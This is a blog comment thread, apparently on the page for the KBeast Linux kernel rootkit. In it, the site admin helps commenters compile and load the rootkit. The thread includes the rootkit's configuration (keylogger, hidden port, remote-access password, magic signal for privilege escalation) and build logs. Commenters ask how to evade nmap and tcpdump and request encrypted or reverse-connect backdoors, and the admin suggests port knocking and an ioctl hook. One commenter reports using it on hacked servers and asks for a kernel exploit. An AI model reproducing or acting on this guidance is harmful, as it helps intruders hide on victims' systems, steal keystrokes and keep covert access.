    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘exit’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:734: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:741: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
    make[2]: *** [/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o] Error 1
    make[1]: *** [_module_/usr/_h4x_/_H4X0R_dez] Error 2
    make[1]: Leaving directory `/usr/src/linux-headers-2.6.35-22-generic’
    make: *** [all] Error 2

    thank you for bring me help !!

  28. 28
    IPSECS Admin Says:

    Hi There,
    Based on config.h that you paste above, the problem is because you remove # before define. So kbeast compilation has error. It’s C not perl/bash.

  29. 29
    jeandez Says:

    that help. But after adding # before define, i got

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [OK]
    Inserting Loadable Kernel Module : [NOT OK] // oops !!!!!!!!!

    there is a problem when Inserting loadable kernel Module ..

    i also give you my config.h file , perhaps a problem with.

    #define TRUE 1
    #define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    #define KBEAST “kbeast”

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ “_h4x_”

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    #define _H4X_PATH_ “/usr/_h4x_/_H4X0R_dez”

    /*
    File to save key logged data
    */
    #define _LOGFILE_ “acctlog”

    /*
    This port will be hidded from netstat
    */
    #define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    #define _RPASSWORD_ “h4x3d”
    #define _MAGIC_NAME_ “kangaman”
    /*
    Magic signal & pid for local escalation
    */
    #define _MAGIC_SIG_ 37 //kill signal
    #define _MAGIC_PID_ 31337 //kill this pid

  30. 30
    IPSECS Admin Says:

    can you go to the H4X PATH directory then type ‘insmod ipsecs-kbeast-v1.ko’ , paste the result here

  31. 31
    jeandez Says:

    i got :
    insmod: error inserting ‘ipsecs-kbeast-V1.ko’: -1 operation not permitted
    that means only root can install a rootkit???????

    i pass to root : /usr/_h4x_/_H4X0R_dez# inmod-kbeast-v1.ko
    ok that functions.but problem when doing ./setup build 1

  32. 32
    jeandez Says:

    root@kangaman-laptop:/usr/_h4x_/_H4X0R_dez/kbeast-v1# ./setup build

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/kbeast-v1/ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/kbeast-v1/ipsecs-kbeast-v1.cc1»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/kbeast-v1/bd-ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.ipsecs-kbeast-v1.o.cmd»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.ipsecs-kbeast-v1.mod.o.cmd»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.ko»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.cc1»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.ipsecs-kbeast-v1.ko.cmd»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/bd-ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.mod.o»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.tmp_versions/ipsecs-kbeast-v1.mod»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.mod.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o»: Permission non accordée
    cp: «/usr/_h4x_/_H4X0R_dez/kbeast-v1» et «/usr/_h4x_/_H4X0R_dez/kbeast-v1» identifient le même fichier
    [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [OK]
    Inserting Loadable Kernel Module : [NOT OK] ////!!!!!!pblem

  33. 33
    IPSECS Admin Says:

    Hi There,
    From my point of view, before you start to play with loadable kernel rootkit, at least please:
    1. Learning basic C programming
    2. Learning general loadable linux kernel
    3. Learning how to read bash script

    After “insmod” is successfully executed, kbeast is already installed on your machine, that’s why removing kbeast directory experiences failure.

    If you still don’t understand, reboot your box, remove /usr/_h4x_, re-download kbeast source, don’t screw up with it because you don’t understand, run ./setup build . Thx

  34. 34
    jeandez Says:

    thank you for advises.i’ll try to improve..

  35. 35
    Pr0ts Says:

    Dude`s i`ve be testing KBeast, and first of all congratz for your work.
    I have some points:
    When i nmap from inside, i can get the TCP Open port;
    TCPdump also shows the activity at the rootkit (from inside the host)

    those things are possible to be bypassed? if so, you know any rootkit who does it?
    Thanks

  36. 36
    jeandez Says:

    i didn’t try, but you can try ‘knark’ (but it is old)

  37. 37
    IPSECS Admin Says:

    Hi Pr0ts,
    Yes it’s detected remotely. I think that we can use port knocking concept to solve your concern. But, we should modify ioctl syscall to hide your sniffer. Tq

  38. 38
    IPSECS Admin Says:

    I mean the sniffer used by port knocking in order to activate remote backdoor whenever you need.

  39. 39
    blackrain Says:

    I have a few ideas for the next version:

    Remote backdoor uses encrypted protocol (so admin can’t see what
    commands you have typed by using a packet sniffer).

    Any already open port can be used to gain access using a remote backdoor.

    Support for newer Linux 3.x kernels (Ubuntu 11.10 and 12.04) if not
    already implemented.

  40. 40
    Student Says:

    hi,
    i installed Kbeast without changing the config.h file. then i ran rkhunter(the newest version which detects Kbeast) and i saw there was no hidden process. in fact i am going to see when Kbeast would be active and do something,which PIDs will be run.but now i could not see any hidden proc through rkhunter.i think since i didnot active Kbeast and that did not work,this happened.would any one help me how can i work with Kbeast?
    thanks alot.

  41. 41
    Rootkit pid | Clickforbiz Says:

    [...] IT Security – [UPDATE] KBeast – The New Kernel Rootkit [...]

  42. 42
    student Says:

    hi,
    i installed kbeast and then run rkhunter-1.4.0.it detected kbeast and show me the message that kbeast rootkit found that.
    but when i changed the code of rootkit,and try to build it again,i saw error.so i clear those changes and try to install kbeast again without any change.it told me that it built correctly,but when i ran rkhunter again, i saw the message that kbeast rootkit warning(possible rootkit),in fact that could not detect it completely,what should i do?
    i want rkhunter detect it and then i see the hidden processes that were created because of that rootkit?

  43. 43
    anonymous Says:

    I lost four hacked servers with that rootkit. After the installation the rootkit working very well. So, after some time a have only a system unstable. Now, how I can exploit the new system reinstalled by adm? Do you have an exploit for 3.2.0-24 kernel linux?

  44. 44
    rex Says:

    if you can replace the bind port backdoor with the connect-back backdoor,it would be perfect.

  45. 45
    rex Says:

    if you can replace the bind port backdoor with the reverse-connect backdoor,it would be perfect.

  46. 46
    Syd Says:

    I installed KBeast (Linux rootkit 2012) and the package works just as described except for the fact that I can’t seem to see anything in my key logging file (i.e. the file is empty). In particular, below is how I define this file.

    /*
    File to save key logged data
    */
    #define _LOGFILE_ “rootkit.log”

    However, when I go to the location of this file “/usr/_h4x_rootKit” I see a file named “rootkit.log.9″. When I attempt to read this file (using vim) I get the message that the file is already opened, and if I open it in “read only” mode (or using cat), its empty. How do I view the data?

  47. 47
    rex Says:

    Hi. I tested this on centos6.3(64bit) running 2.6.32-279 and it didn’t work,help me.
    [root@test1 kbeast-v1]# uname -a
    Linux test1 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
    [root@test1 kbeast-v1]# ./setup build 1

    ::::::::::: ::::::::: :::::::: :::::::::: :::::::: ::::::::
    :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
    +:+ +:+ +:+ +:+ +:+ +:+ +:+
    +#+ +#++:++#+ +#++:++#++ +#++:++# +#+ +#++:++#++
    +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+# #+# #+# #+# #+# #+#
    ########### ### ######## ########## ######## ########

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [NOT OK]

    [root@test1 kbeast-v1]# cat config.h
    /*
    Kernel Beast Ver #1.0 – Configuration File
    Copyright Ph03n1X of IPSECS (c) 2011
    Get more research of ours http://ipsecs.com
    */

    /*Don’t change this line*/
    #define TRUE 1
    #define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    #define KBEAST “kbeast”

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ “_h4x_”

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    #define _H4X_PATH_ “/usr/_h4x_”

    /*
    File to save key logged data
    */
    #define _LOGFILE_ “acctlog”

    /*
    This port will be hidded from netstat
    */
    #define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    #define _RPASSWORD_ “h4x3d”
    #define _MAGIC_NAME_ “xxx”
    /*
    Magic signal & pid for local escalation
    */
    #define _MAGIC_SIG_ 37 //kill signal
    #define _MAGIC_PID_ 31337 //kill this pid

  48. 48
    rex Says:

    [root@test1 _h4x_]# make
    make -C /lib/modules/2.6.32-279.el6.x86_64/build M=/usr/_h4x_ modules
    make[1]: Entering directory `/usr/src/kernels/2.6.32-279.el6.x86_64′
    CC [M] /usr/_h4x_/ipsecs-kbeast-v1.o
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:239: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:476: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_getdents’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:507: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:509: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:511: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:513: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:516: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:521: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:503: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c:523: warning: ignoring return value of ‘copy_to_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:569: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:584: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:598: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:613: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c:614: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:630: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:664: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘init’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
    /usr/_h4x_/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:691: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:692: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c: At top level:
    /usr/_h4x_/ipsecs-kbeast-v1.c:727: warning: conflicting types for built-in function ‘exit’
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘exit’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:739: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
    make[2]: *** [/usr/_h4x_/ipsecs-kbeast-v1.o] Error 1
    make[1]: *** [_module_/usr/_h4x_] Error 2
    make[1]: Leaving directory `/usr/src/kernels/2.6.32-279.el6.x86_64′
    make: *** [all] Error 2

  49. 49
    pxf Says:

    Hi. I tested this on centos6.3(64bit) running 2.6.32 and it didn’t work,on centos6.2 (32bit) is ok.

    Last login: Fri Mar 2 19:32:48 2012
    /bin/basename: missing operand
    Try `/bin/basename –help’ for more information.

    why?

  50. 50
    tirher Says:

    I have this kernel:

    # uname -a
    Linux redes-seguridad.com.ar 2.6.32-220.el6.i686 #1 SMP Tue Dec 6 16:15:40 GMT 2011 i686 i686 i386 GNU/Linux

    In centos:

    # cat /etc/issue
    CentOS release 6.3 (Final)
    Kernel \r on an \m

    And when i run this, obtein an error:

    # ./setup build
    Checking for Kernel Header : [NOT OK] – Please Install!

    How can i fix this? I try installing kernel-headers, but not work.

    Tnks

  51. 51
    aerosmith Says:

    help me,
    my problem same “How can i fix this? I try installing kernel-headers, but not work.”

    how fix?
    thanks

 

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

 

What is 5 + 3 ?
Please leave these two fields as-is:
IMPORTANT! To be able to proceed, you need to solve the following simple math (so we know that you are a human) :-)